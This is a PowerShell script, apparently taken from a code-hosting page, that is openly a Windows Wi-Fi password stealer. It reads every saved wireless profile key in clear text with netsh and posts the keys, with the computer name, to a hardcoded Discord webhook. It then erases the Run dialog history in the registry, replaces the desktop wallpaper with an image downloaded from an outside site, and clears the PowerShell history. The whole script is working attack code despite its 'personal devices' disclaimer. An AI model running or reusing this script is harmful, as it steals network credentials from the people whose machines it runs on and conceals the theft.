156 lines
5.5 KiB
PowerShell
156 lines
5.5 KiB
PowerShell
|
|
##############################################################################################
|
|
# _;~) (~;_ #
|
|
# ( | | ) #
|
|
# Title : Exfiltrate wifi passes on Win Target ~', ', ,''~'', ,' ,'~ #
|
|
# Author : DAProgs ', ',' ',' ,' #
|
|
# Version : 1.0 ',: {'} {'} :,' #
|
|
# Category : Password Exfiltration ; /^\ ; #
|
|
# Target : Windows 10, 11 ~\ ~ /~ #
|
|
# ,' ,~~~~~, ', #
|
|
# My crime is that of curiosity ,' ,' ;~~~; ', ', #
|
|
# ,' ,' ''' ', ', #
|
|
# Use these scripts only for experimenting on your (~ ; ; ~) #
|
|
# personnal devices -;_) (_;- #
|
|
##############################################################################################
|
|
|
|
$DiscordwebhookUri = 'https://discord.com/api/webhooks/1419793734245285888/QAmMrxeNTFbjIA1eridj0yn7IElDu_8WfUKOvSAHjNutTIpVd8ZXJ2Tnxm2PlyeBKOMq'
|
|
|
|
$path = $env:TEMP + '' + '\Wallpaper.jpg'
|
|
$DownloadDirectory = $env:TEMP + '\'
|
|
|
|
function DeleteKeys
|
|
{
|
|
$Reg = Get-RegistryValues 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
|
|
foreach ($Value in $Reg)
|
|
{
|
|
if ($Value -eq 'MRUList') {
|
|
Set-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\' -name $Value -value ' '
|
|
}
|
|
Else {
|
|
Remove-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -name $Value
|
|
}
|
|
}
|
|
}
|
|
|
|
function Get-RegistryValues($Key)
|
|
{
|
|
(Get-Item $Key).GetValueNames()
|
|
}
|
|
|
|
function DownloadBackground
|
|
{
|
|
$Data = @{
|
|
WallpaperURL = "https://www.home.daprogs.net/dl/" # Change to your fitting
|
|
RegKeyPath2 = 'HKCU:\Control Panel\Desktop'
|
|
}
|
|
$myArray = 'background1.jpg', 'background2.jpg', 'background3.jpg', 'background4.jpg', 'background5.jpg'
|
|
$randomItem = $myArray | Get-Random
|
|
$WallpaperSRC = $Data.WallpaperURL + '' + $randomItem
|
|
$WallpaperDest = $($DownloadDirectory + "\Wallpaper." + ($WallpaperSRC -replace ".*\."))
|
|
New-Item -ItemType Directory -Path $DownloadDirectory -ErrorAction SilentlyContinue
|
|
Start-BitsTransfer -Source $WallpaperSRC -Destination $WallpaperDest
|
|
Set-ItemProperty -Path $Data.RegKeyPath2 -Name 'WallPaper' -Value $WallpaperDest #-Force | Out-Null
|
|
rundll32.exe user32.dll, UpdatePerUserSystemParameters
|
|
}
|
|
|
|
function SendPass
|
|
{
|
|
$Body='Computer:' + $env:computername
|
|
$Body+=[Environment]::NewLine
|
|
netsh wlan show profile |
|
|
Select-String '(?<=All User Profile\s+:\s).+' |
|
|
ForEach-Object {
|
|
$wlan = $_.Matches.Value
|
|
$passw = netsh wlan show profile $wlan key=clear |
|
|
Select-String '(?<=Key Content\s+:\s).+'
|
|
$passw2=""
|
|
try {
|
|
$passw2=$passw.Line.split(":")[1] #Will cause errors no blank line check
|
|
} catch {
|
|
|
|
}
|
|
$Body+='Wlan: ' + $wlan
|
|
$Body+=[Environment]::NewLine
|
|
$Body+=$passw2
|
|
$Body+=[Environment]::NewLine
|
|
}
|
|
$Body+=[Environment]::NewLine
|
|
|
|
$Body2 = @{
|
|
'username' = 'SpilledCanOfBeans'
|
|
'content' = $Body
|
|
}
|
|
|
|
Invoke-RestMethod -Uri $DiscordwebhookUri -Method 'post' -Body $Body2
|
|
}
|
|
|
|
|
|
#Set-WindowsWallpaper from Microsoft Employee
|
|
Add-Type -AssemblyName System.Drawing
|
|
|
|
Add-Type @"
|
|
using System;
|
|
using System.Runtime.InteropServices;
|
|
using Microsoft.Win32;
|
|
namespace Wallpaper {
|
|
public enum Style : int {
|
|
Tile, Center, Stretch, Fill, NoChange
|
|
}
|
|
|
|
public class Setter {
|
|
public const int SetDesktopWallpaper = 0x14; // SPI_SETDESKWALLPAPER
|
|
public const int UpdateIniFile = 0x01; // SPIF_UPDATEINIFILE
|
|
public const int SendWinIniChange = 0x02; // SPIF_SENDWININICHANGE
|
|
|
|
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
|
|
private static extern int SystemParametersInfo (int uAction, int uParam, string lpvParam, int fuWinIni);
|
|
|
|
public static void SetWallpaper ( string path, Wallpaper.Style style ) {
|
|
SystemParametersInfo( SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange );
|
|
RegistryKey key = Registry.CurrentUser.OpenSubKey("Control Panel\\Desktop", true);
|
|
switch( style ) {
|
|
case Style.Stretch :
|
|
key.SetValue(@"WallpaperStyle", "2") ;
|
|
key.SetValue(@"TileWallpaper", "0") ;
|
|
break;
|
|
case Style.Center :
|
|
key.SetValue(@"WallpaperStyle", "1") ;
|
|
key.SetValue(@"TileWallpaper", "0") ;
|
|
break;
|
|
case Style.Tile :
|
|
key.SetValue(@"WallpaperStyle", "1") ;
|
|
key.SetValue(@"TileWallpaper", "1") ;
|
|
break;
|
|
case Style.Fill :
|
|
key.SetValue(@"WallpaperStyle", "10") ;
|
|
key.SetValue(@"TileWallpaper", "0") ;
|
|
break;
|
|
case Style.NoChange :
|
|
break;
|
|
}
|
|
key.Close();
|
|
}
|
|
}
|
|
}
|
|
"@
|
|
|
|
|
|
SendPass
|
|
DeleteKeys
|
|
DownloadBackground
|
|
|
|
### now pass the generated BMP file and set the wallpaper.
|
|
$Tile = 3
|
|
#Center = 1
|
|
#Stretch = 2
|
|
#Fill = 3
|
|
#NoChange = 4
|
|
|
|
[Wallpaper.Setter]::SetWallpaper( $path, $Tile)
|
|
Start-Sleep -Seconds 2
|
|
#Remove-Item -Path $path
|
|
|
|
Clear-History
|
|
|